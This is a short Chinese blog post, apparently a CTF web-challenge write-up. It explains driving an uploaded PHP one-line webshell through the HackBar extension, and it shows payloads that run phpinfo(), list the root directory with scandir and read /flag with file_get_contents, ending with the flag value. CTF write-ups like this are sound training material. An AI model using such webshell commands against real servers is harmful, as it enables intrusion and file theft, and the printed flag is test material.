归志宁无五亩园,读书本意在元元。这篇文章主要讲述一句话马,不用蚁剑连接通过hack_bar连接相关的知识,希望能为你提供帮助。
ctf中web的一道题
1、进行一句话马上传成功之后
f12打开hack_bar
文章图片
cmd(一句话马所传入设置的密码)=phpinfo(); 查看被禁用掉的函数
看了下被禁用的函数,发现还是可以进行目标浏览和文件读取
【一句话马,不用蚁剑连接通过hack_bar连接】2、查找根目录,利用var_dump()打印、scandir()查找函数
cmd=var_dump(scandir(\'/\'));
文章图片
发现根目录下存在flag
3、读取目标文件下、并打印出来file_get_contents(); 获取目标文件
cmd=var_dump(file_get_contents(\'/flag\'));
文章图片
得到flag:flag{3252054f-bd05-453a-acc8-a252b4eaaee6}
推荐阅读
- 性能工具之Jmeter压测Hprose RPC服务
- 在Vue中使用JSX,很easy的
- K8S Dashboard token查看
- 警告(count()在我的single.php中获取wordpress帖子的内容)
- 想要交换每个类别的wordpress配色方案
- 想要从主题页脚中删除链接
- 要覆盖写在woocommerce-functions.php文件中的函数
- 想要使WordPress网站中每个页面加载的脚本保持不变
- 文本和图像的Visual/HTML编辑器问题